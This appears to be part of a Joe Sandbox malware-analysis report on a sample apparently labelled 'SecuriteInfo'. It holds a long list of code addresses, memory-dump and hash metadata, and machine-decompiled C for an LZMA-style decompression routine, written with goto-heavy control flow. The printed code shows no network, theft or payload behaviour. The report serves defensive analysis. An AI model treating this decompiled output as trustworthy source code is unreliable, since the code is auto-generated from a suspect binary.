                                                                        0x00406c62
                                                                        0x00406c67
                                                                        0x00406c67
                                                                        0x00406c70
                                                                        0x00406c78
                                                                        0x00406c7b
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c81
                                                                        0x00000000
                                                                        0x00406c9e
                                                                        0x00406c9e
                                                                        0x00406ca2
                                                                        0x0040754e
                                                                        0x00000000
                                                                        0x0040754e
                                                                        0x00406cab
                                                                        0x00406cbb
                                                                        0x00406cbe
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc1
                                                                        0x00406cc4
                                                                        0x00406cc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406cca
                                                                        0x00406cd0
                                                                        0x00406cfa
                                                                        0x00406d00
                                                                        0x00406d07
                                                                        0x00000000
                                                                        0x00406d07
                                                                        0x00406cd6
                                                                        0x00406cd9
                                                                        0x00406cde
                                                                        0x00406cde
                                                                        0x00406ce9
                                                                        0x00406cf1
                                                                        0x00406cf4
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d39
                                                                        0x00406d3f
                                                                        0x00406d42
                                                                        0x00406d4f
                                                                        0x00406d57
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d0e
                                                                        0x00406d0e
                                                                        0x00406d12
                                                                        0x0040755d
                                                                        0x00000000
                                                                        0x0040755d
                                                                        0x00406d1e
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d29
                                                                        0x00406d2c
                                                                        0x00406d2f
                                                                        0x00406d32
                                                                        0x00406d37
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004073ce
                                                                        0x004073ce
                                                                        0x004073d4
                                                                        0x004073da
                                                                        0x004073e0
                                                                        0x004073fa
                                                                        0x004073fd
                                                                        0x00407403
                                                                        0x0040740e
                                                                        0x00407410
                                                                        0x004073e2
                                                                        0x004073e2
                                                                        0x004073f1
                                                                        0x004073f5
                                                                        0x004073f5
                                                                        0x0040741a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406d5f
                                                                        0x00406d61
                                                                        0x00406d64
                                                                        0x00406dd5
                                                                        0x00406dd8
                                                                        0x00406ddb
                                                                        0x00406de2
                                                                        0x00406dec
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x00406d66
                                                                        0x00406d6a
                                                                        0x00406d6d
                                                                        0x00406d6f
                                                                        0x00406d72
                                                                        0x00406d75
                                                                        0x00406d77
                                                                        0x00406d7a
                                                                        0x00406d7c
                                                                        0x00406d81
                                                                        0x00406d84
                                                                        0x00406d87
                                                                        0x00406d8b
                                                                        0x00406d92
                                                                        0x00406d95
                                                                        0x00406d9c
                                                                        0x00406da0
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da8
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406da2
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406d97
                                                                        0x00406dac
                                                                        0x00406daf
                                                                        0x00406dcd
                                                                        0x00406dcf
                                                                        0x00000000
                                                                        0x00406db1
                                                                        0x00406db1
                                                                        0x00406db4
                                                                        0x00406db7
                                                                        0x00406dba
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbc
                                                                        0x00406dbf
                                                                        0x00406dc2
                                                                        0x00406dc4
                                                                        0x00406dc5
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00406dc8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407068
                                                                        0x0040706c
                                                                        0x0040708f
                                                                        0x00407092
                                                                        0x00407095
                                                                        0x0040709f
                                                                        0x0040706e
                                                                        0x0040706e
                                                                        0x00407071
                                                                        0x00407074
                                                                        0x00407077
                                                                        0x00407084
                                                                        0x00407087
                                                                        0x00407087
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004070ab
                                                                        0x004070af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070b5
                                                                        0x004070b9
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070bf
                                                                        0x004070c1
                                                                        0x004070c5
                                                                        0x004070c5
                                                                        0x004070c8
                                                                        0x004070cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040711c
                                                                        0x00407120
                                                                        0x00407127
                                                                        0x0040712a
                                                                        0x0040712d
                                                                        0x00407137
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00407122
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407143
                                                                        0x00407147
                                                                        0x0040714e
                                                                        0x00407151
                                                                        0x00407154
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407149
                                                                        0x00407157
                                                                        0x0040715a
                                                                        0x0040715d
                                                                        0x0040715d
                                                                        0x00407160
                                                                        0x00407163
                                                                        0x00407166
                                                                        0x00407166
                                                                        0x00407169
                                                                        0x00407170
                                                                        0x00407175
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407203
                                                                        0x00407203
                                                                        0x00407207
                                                                        0x004075a5
                                                                        0x00000000
                                                                        0x004075a5
                                                                        0x0040720d
                                                                        0x00407210
                                                                        0x00407213
                                                                        0x00407217
                                                                        0x0040721a
                                                                        0x00407220
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407222
                                                                        0x00407225
                                                                        0x00407228
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406df8
                                                                        0x00406df8
                                                                        0x00406dfc
                                                                        0x00407569
                                                                        0x00000000
                                                                        0x00407569
                                                                        0x00406e02
                                                                        0x00406e05
                                                                        0x00406e08
                                                                        0x00406e0c
                                                                        0x00406e0f
                                                                        0x00406e15
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e17
                                                                        0x00406e1a
                                                                        0x00406e1d
                                                                        0x00406e1d
                                                                        0x00406e20
                                                                        0x00406e23
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e29
                                                                        0x00406e2f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406e35
                                                                        0x00406e35
                                                                        0x00406e39
                                                                        0x00406e3c
                                                                        0x00406e3f
                                                                        0x00406e42
                                                                        0x00406e45
                                                                        0x00406e46
                                                                        0x00406e49
                                                                        0x00406e4b
                                                                        0x00406e51
                                                                        0x00406e54
                                                                        0x00406e57
                                                                        0x00406e5a
                                                                        0x00406e5d
                                                                        0x00406e60
                                                                        0x00406e63
                                                                        0x00406e7f
                                                                        0x00406e82
                                                                        0x00406e85
                                                                        0x00406e88
                                                                        0x00406e8f
                                                                        0x00406e93
                                                                        0x00406e95
                                                                        0x00406e99
                                                                        0x00406e65
                                                                        0x00406e65
                                                                        0x00406e69
                                                                        0x00406e71
                                                                        0x00406e76
                                                                        0x00406e78
                                                                        0x00406e7a
                                                                        0x00406e7a
                                                                        0x00406e9c
                                                                        0x00406ea3
                                                                        0x00406ea6
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eac
                                                                        0x00000000
                                                                        0x00406eb1
                                                                        0x00406eb1
                                                                        0x00406eb5
                                                                        0x00407575
                                                                        0x00000000
                                                                        0x00407575
                                                                        0x00406ebb
                                                                        0x00406ebe
                                                                        0x00406ec1
                                                                        0x00406ec5
                                                                        0x00406ec8
                                                                        0x00406ece
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed0
                                                                        0x00406ed3
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406ed6
                                                                        0x00406edc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406ede
                                                                        0x00406ee1
                                                                        0x00406ee4
                                                                        0x00406ee7
                                                                        0x00406eea
                                                                        0x00406eed
                                                                        0x00406ef0
                                                                        0x00406ef3
                                                                        0x00406ef6
                                                                        0x00406ef9
                                                                        0x00406efc
                                                                        0x00406f14
                                                                        0x00406f17
                                                                        0x00406f1a
                                                                        0x00406f1d
                                                                        0x00406f1d
                                                                        0x00406f20
                                                                        0x00406f24
                                                                        0x00406f26
                                                                        0x00406efe
                                                                        0x00406efe
                                                                        0x00406f06
                                                                        0x00406f0b
                                                                        0x00406f0d
                                                                        0x00406f0f
                                                                        0x00406f0f
                                                                        0x00406f29
                                                                        0x00406f30
                                                                        0x00406f33
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00000000
                                                                        0x00406f35
                                                                        0x00406f33
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00406f3a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f75
                                                                        0x00406f75
                                                                        0x00406f79
                                                                        0x00407581
                                                                        0x00000000
                                                                        0x00407581
                                                                        0x00406f7f
                                                                        0x00406f82
                                                                        0x00406f85
                                                                        0x00406f89
                                                                        0x00406f8c
                                                                        0x00406f92
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f94
                                                                        0x00406f97
                                                                        0x00406f9a
                                                                        0x00406f9a
                                                                        0x00406fa0
                                                                        0x00406f3e
                                                                        0x00406f3e
                                                                        0x00406f41
                                                                        0x00000000
                                                                        0x00406f41
                                                                        0x00406fa2
                                                                        0x00406fa2
                                                                        0x00406fa5
                                                                        0x00406fa8
                                                                        0x00406fab
                                                                        0x00406fae
                                                                        0x00406fb1
                                                                        0x00406fb4
                                                                        0x00406fb7
                                                                        0x00406fba
                                                                        0x00406fbd
                                                                        0x00406fc0
                                                                        0x00406fd8
                                                                        0x00406fdb
                                                                        0x00406fde
                                                                        0x00406fe1
                                                                        0x00406fe1
                                                                        0x00406fe4
                                                                        0x00406fe8
                                                                        0x00406fea
                                                                        0x00406fc2
                                                                        0x00406fc2
                                                                        0x00406fca
                                                                        0x00406fcf
                                                                        0x00406fd1
                                                                        0x00406fd3
                                                                        0x00406fd3
                                                                        0x00406fed
                                                                        0x00406ff4
                                                                        0x00406ff7
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00406ff9
                                                                        0x00000000
                                                                        0x00407286
                                                                        0x00407286
                                                                        0x0040728a
                                                                        0x004075b1
                                                                        0x00000000
                                                                        0x004075b1
                                                                        0x00407290
                                                                        0x00407293
                                                                        0x00407296
                                                                        0x0040729a
                                                                        0x0040729d
                                                                        0x004072a3
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a5
                                                                        0x004072a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407056
                                                                        0x00407056
                                                                        0x00407059
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00407395
                                                                        0x00407399
                                                                        0x004073bb
                                                                        0x004073be
                                                                        0x004073c8
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x004073cb
                                                                        0x004073cb
                                                                        0x0040739b
                                                                        0x0040739e
                                                                        0x004073a2
                                                                        0x004073a5
                                                                        0x004073a5
                                                                        0x004073a8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407452
                                                                        0x00407456
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x00407474
                                                                        0x0040747b
                                                                        0x00407482
                                                                        0x00407489
                                                                        0x00407489
                                                                        0x00000000
                                                                        0x00407489
                                                                        0x00407458
                                                                        0x0040745b
                                                                        0x0040745e
                                                                        0x00407461
                                                                        0x00407468
                                                                        0x004073ac
                                                                        0x004073ac
                                                                        0x004073af
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407543
                                                                        0x00407546
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040717d
                                                                        0x0040717f
                                                                        0x00407186
                                                                        0x00407187
                                                                        0x00407189
                                                                        0x0040718c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407194
                                                                        0x00407197
                                                                        0x0040719a
                                                                        0x0040719c
                                                                        0x0040719e
                                                                        0x0040719e
                                                                        0x0040719f
                                                                        0x004071a2
                                                                        0x004071a9
                                                                        0x004071ac
                                                                        0x004071ba
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407490
                                                                        0x00407490
                                                                        0x00407493
                                                                        0x0040749a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040749f
                                                                        0x0040749f
                                                                        0x004074a3
                                                                        0x004075db
                                                                        0x00000000
                                                                        0x004075db
                                                                        0x004074a9
                                                                        0x004074ac
                                                                        0x004074af
                                                                        0x004074b3
                                                                        0x004074b6
                                                                        0x004074bc
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074be
                                                                        0x004074c1
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c4
                                                                        0x004074c7
                                                                        0x004074c7
                                                                        0x004074cb
                                                                        0x0040752b
                                                                        0x0040752e
                                                                        0x00407533
                                                                        0x00407534
                                                                        0x00407536
                                                                        0x00407538
                                                                        0x0040753b
                                                                        0x00407447
                                                                        0x00407447
                                                                        0x00000000
                                                                        0x0040744d
                                                                        0x00407447
                                                                        0x004074cd
                                                                        0x004074d3
                                                                        0x004074d6
                                                                        0x004074d9
                                                                        0x004074dc
                                                                        0x004074df
                                                                        0x004074e2
                                                                        0x004074e5
                                                                        0x004074e8
                                                                        0x004074eb
                                                                        0x004074ee
                                                                        0x00407507
                                                                        0x0040750a
                                                                        0x0040750d
                                                                        0x00407510
                                                                        0x00407514
                                                                        0x00407516
                                                                        0x00407516
                                                                        0x00407517
                                                                        0x0040751a
                                                                        0x004074f0
                                                                        0x004074f0
                                                                        0x004074f8
                                                                        0x004074fd
                                                                        0x004074ff
                                                                        0x00407502
                                                                        0x00407502
                                                                        0x0040751d
                                                                        0x00407524
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x00407526
                                                                        0x00000000
                                                                        0x004071c2
                                                                        0x004071c5
                                                                        0x004071fb
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732b
                                                                        0x0040732e
                                                                        0x0040732e
                                                                        0x00407331
                                                                        0x00407333
                                                                        0x004075bd
                                                                        0x00000000
                                                                        0x004075bd
                                                                        0x00407339
                                                                        0x0040733c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407342
                                                                        0x00407346
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00407349
                                                                        0x00000000
                                                                        0x00407349
                                                                        0x004071c7
                                                                        0x004071c9
                                                                        0x004071cb
                                                                        0x004071cd
                                                                        0x004071d0
                                                                        0x004071d1
                                                                        0x004071d3
                                                                        0x004071d5
                                                                        0x004071d8
                                                                        0x004071db
                                                                        0x004071f1
                                                                        0x004071f6
                                                                        0x0040722e
                                                                        0x0040722e
                                                                        0x00407232
                                                                        0x0040725e
                                                                        0x00407260
                                                                        0x00407267
                                                                        0x0040726a
                                                                        0x0040726d
                                                                        0x0040726d
                                                                        0x00407272
                                                                        0x00407272
                                                                        0x00407274
                                                                        0x00407277
                                                                        0x0040727e
                                                                        0x00407281
                                                                        0x004072ae
                                                                        0x004072ae
                                                                        0x004072b1
                                                                        0x004072b4
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00407328
                                                                        0x00000000
                                                                        0x00407328
                                                                        0x004072b6
                                                                        0x004072bc
                                                                        0x004072bf
                                                                        0x004072c2
                                                                        0x004072c5
                                                                        0x004072c8
                                                                        0x004072cb
                                                                        0x004072ce
                                                                        0x004072d1
                                                                        0x004072d4
                                                                        0x004072d7
                                                                        0x004072f0
                                                                        0x004072f2
                                                                        0x004072f5
                                                                        0x004072f6
                                                                        0x004072f9
                                                                        0x004072fb
                                                                        0x004072fe
                                                                        0x00407300
                                                                        0x00407302
                                                                        0x00407305
                                                                        0x00407307
                                                                        0x0040730a
                                                                        0x0040730e
                                                                        0x00407310
                                                                        0x00407310
                                                                        0x00407311
                                                                        0x00407314
                                                                        0x00407317
                                                                        0x004072d9
                                                                        0x004072d9
                                                                        0x004072e1
                                                                        0x004072e6
                                                                        0x004072e8
                                                                        0x004072eb
                                                                        0x004072eb
                                                                        0x0040731a
                                                                        0x00407321
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x004072ab
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00000000
                                                                        0x00407323
                                                                        0x00407321
                                                                        0x00407234
                                                                        0x00407237
                                                                        0x00407239
                                                                        0x0040723c
                                                                        0x0040723f
                                                                        0x00407242
                                                                        0x00407244
                                                                        0x00407247
                                                                        0x0040724a
                                                                        0x0040724a
                                                                        0x0040724d
                                                                        0x0040724d
                                                                        0x00407250
                                                                        0x00407257
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x0040722b
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00000000
                                                                        0x00407259
                                                                        0x00407257
                                                                        0x004071dd
                                                                        0x004071e0
                                                                        0x004071e2
                                                                        0x004071e5
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406f44
                                                                        0x00406f44
                                                                        0x00406f48
                                                                        0x0040758d
                                                                        0x00000000
                                                                        0x0040758d
                                                                        0x00406f4e
                                                                        0x00406f51
                                                                        0x00406f54
                                                                        0x00406f57
                                                                        0x00406f5a
                                                                        0x00406f5d
                                                                        0x00406f60
                                                                        0x00406f62
                                                                        0x00406f65
                                                                        0x00406f68
                                                                        0x00406f6b
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00406f6d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004070cf
                                                                        0x004070cf
                                                                        0x004070d3
                                                                        0x00407599
                                                                        0x00000000
                                                                        0x00407599
                                                                        0x004070d9
                                                                        0x004070dc
                                                                        0x004070df
                                                                        0x004070e2
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e4
                                                                        0x004070e7
                                                                        0x004070ea
                                                                        0x004070ed
                                                                        0x004070f0
                                                                        0x004070f3
                                                                        0x004070f6
                                                                        0x004070f7
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070f9
                                                                        0x004070fc
                                                                        0x004070ff
                                                                        0x00407102
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407105
                                                                        0x00407108
                                                                        0x0040710a
                                                                        0x0040710a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x0040734c
                                                                        0x00407350
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00407356
                                                                        0x00407359
                                                                        0x0040735c
                                                                        0x0040735f
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407361
                                                                        0x00407364
                                                                        0x00407367
                                                                        0x0040736a
                                                                        0x0040736d
                                                                        0x00407370
                                                                        0x00407373
                                                                        0x00407374
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407376
                                                                        0x00407379
                                                                        0x0040737c
                                                                        0x0040737f
                                                                        0x00407382
                                                                        0x00407385
                                                                        0x00407389
                                                                        0x0040738b
                                                                        0x0040738e
                                                                        0x00000000
                                                                        0x00407390
                                                                        0x0040710d
                                                                        0x0040710d
                                                                        0x00000000
                                                                        0x0040710d
                                                                        0x0040738e
                                                                        0x004075c3
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00406bf2
                                                                        0x004075fa
                                                                        0x004075fa
                                                                        0x00000000
                                                                        0x004075fa
                                                                        0x00407447
                                                                        0x004073ce
                                                                        0x004073cb
                                                                        0x00000000
                                                                        0x00407002

                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.882263654.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.882255021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882283133.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882292421.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882342652.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882351128.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882361743.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882369815.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.882380197.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                        • Instruction ID: 4a3513360c1d1cc4287bdabe5afcaa460628bed3c0d7ae87261646ca99be8a9f
                                                                        • Opcode Fuzzy Hash: 7ccf24f4e081119859c9f0e48baaaa1d38e3934f3a3b1d8a87677b84cb71901f
                                                                        • Instruction Fuzzy Hash: 0D711271D04228DBEF28CF98C9947ADBBF1FB44305F14806AD856B7280D738A986DF05
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 98%
                                                                        			E0040711C() {
                                                                        				unsigned short _t531;
                                                                        				signed int _t532;
                                                                        				void _t533;
                                                                        				signed int _t534;
                                                                        				signed int _t535;
                                                                        				signed int _t565;
                                                                        				signed int _t568;
                                                                        				signed int _t589;
                                                                        				signed int* _t606;
                                                                        				void* _t613;
                                                                        
                                                                        				L0:
                                                                        				while(1) {
                                                                        					L0:
                                                                        					if( *(_t613 - 0x40) != 0) {
                                                                        						 *(_t613 - 0x84) = 0xb;
                                                                        						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
                                                                        						goto L132;
                                                                        					} else {
                                                                        						__eax =  *(__ebp - 0x28);
                                                                        						L88:
                                                                        						 *(__ebp - 0x2c) = __eax;
                                                                        						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                        						L89:
                                                                        						__eax =  *(__ebp - 4);
                                                                        						 *(__ebp - 0x80) = 0x15;
                                                                        						__eax =  *(__ebp - 4) + 0xa68;
                                                                        						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                                        						L69:
                                                                        						 *(__ebp - 0x84) = 0x12;
                                                                        						while(1) {
                                                                        							L132:
                                                                        							 *(_t613 - 0x54) = _t606;
                                                                        							while(1) {
                                                                        								L133:
                                                                        								_t531 =  *_t606;
                                                                        								_t589 = _t531 & 0x0000ffff;
                                                                        								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                        								if( *(_t613 - 0xc) >= _t565) {
                                                                        									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                        									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                        									 *(_t613 - 0x40) = 1;
                                                                        									_t532 = _t531 - (_t531 >> 5);
                                                                        									 *_t606 = _t532;
                                                                        								} else {
                                                                        									 *(_t613 - 0x10) = _t565;
                                                                        									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        									 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                                        								}
                                                                        								if( *(_t613 - 0x10) >= 0x1000000) {
                                                                        									goto L139;
                                                                        								}
                                                                        								L137:
                                                                        								if( *(_t613 - 0x6c) == 0) {
                                                                        									 *(_t613 - 0x88) = 5;
                                                                        									L170:
                                                                        									_t568 = 0x22;
                                                                        									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                        									_t535 = 0;
                                                                        									L172:
                                                                        									return _t535;
                                                                        								}
                                                                        								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                        								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        								L139:
                                                                        								_t533 =  *(_t613 - 0x84);
                                                                        								while(1) {
                                                                        									 *(_t613 - 0x88) = _t533;
                                                                        									while(1) {
                                                                        										L1:
                                                                        										_t534 =  *(_t613 - 0x88);
                                                                        										if(_t534 > 0x1c) {
                                                                        											break;
                                                                        										}
                                                                        										switch( *((intOrPtr*)(_t534 * 4 +  &M00407602))) {
                                                                        											case 0:
                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        												_t534 =  *( *(_t613 - 0x70));
                                                                        												if(_t534 > 0xe1) {
                                                                        													goto L171;
                                                                        												}
                                                                        												_t538 = _t534 & 0x000000ff;
                                                                        												_push(0x2d);
                                                                        												asm("cdq");
                                                                        												_pop(_t570);
                                                                        												_push(9);
                                                                        												_pop(_t571);
                                                                        												_t609 = _t538 / _t570;
                                                                        												_t540 = _t538 % _t570 & 0x000000ff;
                                                                        												asm("cdq");
                                                                        												_t604 = _t540 % _t571 & 0x000000ff;
                                                                        												 *(_t613 - 0x3c) = _t604;
                                                                        												 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                        												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
                                                                        												_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                        												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                        													L10:
                                                                        													if(_t612 == 0) {
                                                                        														L12:
                                                                        														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                        														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                        														goto L15;
                                                                        													} else {
                                                                        														goto L11;
                                                                        													}
                                                                        													do {
                                                                        														L11:
                                                                        														_t612 = _t612 - 1;
                                                                        														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                        													} while (_t612 != 0);
                                                                        													goto L12;
                                                                        												}
                                                                        												if( *(_t613 - 4) != 0) {
                                                                        													GlobalFree( *(_t613 - 4));
                                                                        												}
                                                                        												_t534 = GlobalAlloc(0x40, 0x600); // executed
                                                                        												 *(_t613 - 4) = _t534;
                                                                        												if(_t534 == 0) {
                                                                        													goto L171;
                                                                        												} else {
                                                                        													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                        													goto L10;
                                                                        												}
                                                                        											case 1:
                                                                        												L13:
                                                                        												__eflags =  *(_t613 - 0x6c);
                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                        													 *(_t613 - 0x88) = 1;
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                        												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                        												_t45 = _t613 - 0x48;
                                                                        												 *_t45 =  *(_t613 - 0x48) + 1;
                                                                        												__eflags =  *_t45;
                                                                        												L15:
                                                                        												if( *(_t613 - 0x48) < 4) {
                                                                        													goto L13;
                                                                        												}
                                                                        												_t546 =  *(_t613 - 0x40);
                                                                        												if(_t546 ==  *(_t613 - 0x74)) {
                                                                        													L20:
                                                                        													 *(_t613 - 0x48) = 5;
                                                                        													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                        													goto L23;
                                                                        												}
                                                                        												 *(_t613 - 0x74) = _t546;
                                                                        												if( *(_t613 - 8) != 0) {
                                                                        													GlobalFree( *(_t613 - 8));
                                                                        												}
                                                                        												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                        												 *(_t613 - 8) = _t534;
                                                                        												if(_t534 == 0) {
                                                                        													goto L171;
                                                                        												} else {
                                                                        													goto L20;
                                                                        												}
                                                                        											case 2:
                                                                        												L24:
                                                                        												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                        												 *(_t613 - 0x84) = 6;
                                                                        												 *(_t613 - 0x4c) = _t553;
                                                                        												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                                        												L132:
                                                                        												 *(_t613 - 0x54) = _t606;
                                                                        												goto L133;
                                                                        											case 3:
                                                                        												L21:
                                                                        												__eflags =  *(_t613 - 0x6c);
                                                                        												if( *(_t613 - 0x6c) == 0) {
                                                                        													 *(_t613 - 0x88) = 3;
                                                                        													goto L170;
                                                                        												}
                                                                        												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                        												_t67 = _t613 - 0x70;
                                                                        												 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                        												__eflags =  *_t67;
                                                                        												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                        												L23:
                                                                        												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                        												if( *(_t613 - 0x48) != 0) {
                                                                        													goto L21;
